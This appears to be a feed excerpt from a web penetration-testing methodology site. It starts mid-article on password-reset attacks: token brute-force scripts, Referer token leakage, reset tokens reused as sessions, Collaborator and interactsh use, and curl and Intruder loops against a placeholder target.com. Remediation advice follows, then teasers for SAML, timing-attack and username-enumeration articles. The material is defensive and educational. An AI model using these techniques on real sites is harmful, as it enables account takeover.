requests.get(f&#39;https://target.com/reset?token={t}&#39;) </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> if r.status_code == 200 and &#39;Invalid&#39; not in r.text: </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> print(f&#39;Valid token: {t}&#39;) </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> break </span></span></span><span style="display:flex;"><span><span style="color:#e6db74">&#34;</span> </span></span></code></pre></div><h3 id="attack-5--token-in-referer-leakage">Attack 5 — Token in Referer Leakage</h3> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span><span style="color:#75715e"># If reset link is: https://target.com/reset?token=abc123</span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># Page at /reset loads external resources (Google Analytics, CDN scripts)</span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># Referer header leaks the token to third parties</span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># Test: visit the reset link → check outgoing Referer headers in Burp</span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># Network tab → look for requests to external domains after clicking reset link</span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># If token is in query string → it leaks to:</span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># - Google Analytics</span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># - Any third-party script on the reset page</span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># - Browser history</span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># - Web server access logs</span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># Also test: is token in response JSON after POST?</span> </span></span><span style="display:flex;"><span>POST /api/reset-password </span></span><span style="display:flex;"><span><span style="color:#f92672">{</span> </span></span><span style="display:flex;"><span> <span style="color:#e6db74">&#34;email&#34;</span>: <span style="color:#e6db74">&#34;attacker@myown.com&#34;</span> </span></span><span style="display:flex;"><span><span style="color:#f92672">}</span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># Response: {&#34;success&#34;: true, &#34;token&#34;: &#34;abc123&#34;, &#34;message&#34;: &#34;Email sent&#34;}</span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># → Token exposed in API response directly</span> </span></span></code></pre></div><h3 id="attack-6--reset-token-as-login-bypass">Attack 6 — Reset Token as Login Bypass</h3> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span><span style="color:#75715e"># Some apps accept reset token as authentication:</span> </span></span><span style="display:flex;"><span>GET /reset?token<span style="color:#f92672">=</span>TOKEN → shows reset form </span></span><span style="display:flex;"><span>POST /reset?token<span style="color:#f92672">=</span>TOKEN → changes password </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># Test: can you skip the password change and use the token to log in?</span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># (Depends on implementation — some single-step flows)</span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># Also: does reset token work as a temp session?</span> </span></span><span style="display:flex;"><span>GET /dashboard HTTP/1.1 </span></span><span style="display:flex;"><span>Cookie: session<span style="color:#f92672">=</span>RESET_TOKEN </span></span><span style="display:flex;"><span><span style="color:#75715e"># → If app accepts reset token as session cookie</span> </span></span></code></pre></div><hr> <h2 id="tools">Tools</h2> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span><span style="color:#75715e"># Burp Collaborator:</span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># Use BURP_COLLABORATOR.oast.pro as Host value</span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># Check Collaborator for incoming DNS + HTTP with reset token</span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># interactsh (open-source Collaborator alternative):</span> </span></span><span style="display:flex;"><span>interactsh-client -v </span></span><span style="display:flex;"><span><span style="color:#75715e"># Get your interactsh URL, use as Host value</span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># Token analysis:</span> </span></span><span style="display:flex;"><span>python3 -c <span style="color:#e6db74">&#34; </span></span></span><span style="display:flex;"><span><span style="color:#e6db74">import base64, hashlib </span></span></span><span style="display:flex;"><span><span style="color:#e6db74">token = &#39;YOUR_RESET_TOKEN&#39; </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"># Check base64: </span></span></span><span style="display:flex;"><span><span style="color:#e6db74">try: print(&#39;b64:&#39;, base64.b64decode(token + &#39;==&#39;)) </span></span></span><span style="display:flex;"><span><span style="color:#e6db74">except: pass </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"># Check hex/hash length: </span></span></span><span style="display:flex;"><span><span style="color:#e6db74">print(f&#39;Len: {len(token)}, Hex: {all(c in \&#34;0123456789abcdef\&#34; for c in token.lower())}&#39;) </span></span></span><span style="display:flex;"><span><span style="color:#e6db74">&#34;</span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># Multiple reset requests for analysis:</span> </span></span><span style="display:flex;"><span><span style="color:#66d9ef">for</span> i in <span style="color:#66d9ef">$(</span>seq <span style="color:#ae81ff">1</span> 5<span style="color:#66d9ef">)</span>; <span style="color:#66d9ef">do</span> </span></span><span style="display:flex;"><span> curl -s -X POST https://target.com/forgot-password <span style="color:#ae81ff">\ </span></span></span><span style="display:flex;"><span> -d <span style="color:#e6db74">&#34;email=attacker+</span>$i<span style="color:#e6db74">@yourdomain.com&#34;</span> &amp; </span></span><span style="display:flex;"><span><span style="color:#66d9ef">done</span> </span></span><span style="display:flex;"><span>wait </span></span><span style="display:flex;"><span><span style="color:#75715e"># Check all received emails → compare tokens for patterns</span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># Burp Intruder for token brute-force:</span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># GET /reset?token=§0000000000§</span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># Payload: Numbers 0000000000 to 9999999999</span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># Match: &#34;New Password&#34; in response</span> </span></span></code></pre></div><hr> <h2 id="remediation-reference">Remediation Reference</h2> <ul> <li><strong>Generate reset URL from server configuration</strong>, not from the <code>Host</code> request header</li> <li><strong>Enforce strict host validation</strong>: use <code>ALLOWED_HOSTS</code> / <code>server_name</code> configuration</li> <li><strong>Cryptographically random tokens</strong>: 256-bit entropy minimum (<code>secrets.token_urlsafe(32)</code> in Python)</li> <li><strong>Short TTL</strong>: reset tokens expire in 10–60 minutes</li> <li><strong>Single-use</strong>: invalidate token immediately after use (even failed attempts after 3 tries)</li> <li><strong>Never send token in response body</strong>: send only via email to registered address</li> <li><strong>Bind token to specific email/account</strong>: verify that token matches the requesting account</li> <li><strong>Avoid query-string tokens</strong> for long-lived operations — use POST body or signed JWT with short TTL</li> </ul> <p><em>Part of the Web Application Penetration Testing Methodology series.</em></p> SAML Attacks https://az0th.it/web/auth/036-auth-saml/ Tue, 24 Feb 2026 00:00:00 +0000 https://az0th.it/web/auth/036-auth-saml/ <h1 id="saml-attacks">SAML Attacks</h1> <blockquote> <p><strong>Severity</strong>: Critical | <strong>CWE</strong>: CWE-287, CWE-347, CWE-611 <strong>OWASP</strong>: A07:2021 – Identification and Authentication Failures</p> </blockquote> <hr> <h2 id="what-is-saml">What Is SAML?</h2> <p>SAML (Security Assertion Markup Language) is an XML-based SSO standard. The Service Provider (SP) delegates authentication to an Identity Provider (IdP). The IdP returns a signed <strong>SAML Assertion</strong> inside a <strong>SAMLResponse</strong>, which the SP must validate before granting access.</p> <pre tabindex="0"><code>User → SP → (redirect) → IdP → (user authenticates) → IdP issues SAMLResponse ← POST SAMLResponse ← (redirect back to SP ACS URL) SP validates signature → extracts NameID/attributes → creates session </code></pre><p><strong>Critical fields in a SAMLResponse</strong>:</p> Timing Attacks on Authentication https://az0th.it/web/auth/032-auth-timing-attacks/ Tue, 24 Feb 2026 00:00:00 +0000 https://az0th.it/web/auth/032-auth-timing-attacks/ <h1 id="timing-attacks-on-authentication">Timing Attacks on Authentication</h1> <blockquote> <p><strong>Severity</strong>: Medium–High | <strong>CWE</strong>: CWE-208, CWE-385 <strong>OWASP</strong>: A02:2021 – Cryptographic Failures | A07:2021 – Identification and Authentication Failures</p> </blockquote> <hr> <h2 id="what-are-timing-attacks">What Are Timing Attacks?</h2> <p>Timing attacks exploit measurable differences in processing time to infer secret information — whether a guess is correct, whether a user exists, or whether a token matches. The root cause is <strong>non-constant-time comparison</strong>: <code>==</code> short-circuits on the first mismatch, so comparing <code>&quot;AAAA&quot; == &quot;AAAB&quot;</code> takes longer than <code>&quot;AAAA&quot; == &quot;ZZZZ&quot;</code> because the mismatch occurs later in the first case.</p> Username Enumeration https://az0th.it/web/auth/031-auth-username-enum/ Tue, 24 Feb 2026 00:00:00 +0000 https://az0th.it/web/auth/031-auth-username-enum/ <h1 id="username-enumeration">Username Enumeration</h1> <blockquote> <p><strong>Severity</strong>: Medium | <strong>CWE</strong>: CWE-204, CWE-203 <strong>OWASP</strong>: A07:2021 – Identification and Authentication Failures</p> </blockquote> <hr> <h2 id="what-is-username-enumeration">What Is Username Enumeration?</h2> <p>Username enumeration allows an attacker to determine which usernames (email addresses, account identifiers) are registered in a system. Even without a password, a validated target list dramatically improves credential stuffing, targeted phishing, and brute force efficiency.</p> <p>Enumeration channels:</p> <ol> <li><strong>Differential HTTP responses</strong>: different status code, body text, or length for valid vs invalid usernames</li> <li><strong>Timing differences</strong>: valid usernames trigger more computation (password hash comparison) → measurable delay</li> <li><strong>Indirect channels</strong>: password reset, registration, OAuth errors, email verification, API error bodies, profile URLs</li> </ol> <pre tabindex="0"><code>Indicator comparison: Invalid user: HTTP 200, body: &#34;Invalid credentials&#34; (13ms) Valid user: HTTP 200, body: &#34;Invalid credentials&#34; (87ms) ← timing leak → identical visible response, but 74ms difference → valid user does bcrypt compare </code></pre><hr> <h2 id="discovery-checklist">Discovery Checklist</h2> <p><strong>Phase 1 — Login Endpoint</strong></p>